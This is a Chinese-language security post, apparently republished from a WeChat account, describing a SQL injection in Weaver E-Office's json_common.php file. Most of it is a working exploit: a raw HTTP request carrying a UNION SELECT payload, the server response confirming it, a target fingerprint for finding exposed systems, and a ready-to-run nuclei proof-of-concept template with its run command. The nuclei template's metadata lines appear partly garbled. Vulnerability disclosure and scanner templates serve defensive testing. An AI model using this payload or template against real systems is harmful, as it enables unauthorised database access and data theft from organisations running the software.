免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
泛微E-Office json_common.php sql注入漏洞
02
—
漏洞影响
泛微E-Office
03
—
漏洞描述
作为协同管理软件行业的领军企业,泛微有业界优秀的协同管理软件产品。在企业级移动互联大潮下,泛微发布了全新的以“移动化 社交化 平台化 云端化”四化为核心的全一代产品系列,其中泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效人事管理。系统 json_common.php 文件存在SQL注入漏洞,容易导致数据泄露以及被远控。
04
—
app="泛微-EOffice"
05
—
漏洞复现
向靶场发送如下数据包,计算102103122的md5
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4
响应数据包如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 36
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Nov 2023 09:21:14 GMT
Server: Apache/2.0.47 (Win32) PHP/5.2.5
Set-Cookie: LOGIN_LANG=cn; expires=Mon, 10-Aug-2026 09:21:14 GMT
X-Powered-By: PHP/5.2.5
["6cfe798ba8e5b85feb50164c59f4bec9"]
证明存在漏洞
06
—
nuclei poc
poc文件内容如下
id: fanwei-eoffice-json-common-sqli
info:
name: 泛微E-Office json_common.php sql注入漏洞
author: fgz
severity: critical
description: '作为协同管理软件行业的领军企业,泛微有业界优秀的协同管理软件产品。在企业级移动互联大潮下,泛微发布了全新的以“移动化 社交化 平台化 云端化”四化为核心的全一代产品系列,其中泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效人事管理。系统 json_common.php 文件存在SQL注入漏洞,容易导致数据泄露以及被远控。'
tags: 2023,fanwei,sqli,eoffice
metadata:
3 :
app="泛微-EOffice" :
verified: true
http:
method: POST
path:
"{{BaseURL}}/building/json_common.php"
headers:
application/x-www-form-urlencoded :
body: "tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333"
matchers:
type: dsl
dsl:
"status_code_1 == 200 && contains(body,'6cfe798ba8e5b85feb50164c59f4bec9')"
在本地新建fanwei-eoffice-json-common-sqli.yaml文件,复制上面POC内容,运行POC
nuclei.exe -t mypoc/泛微/fanwei-eoffice-json-common-sqli.yaml -u http://192.168.86.128:8097
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):泛微E-Office json_common.php SQL注入漏洞(附nuclei poc)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论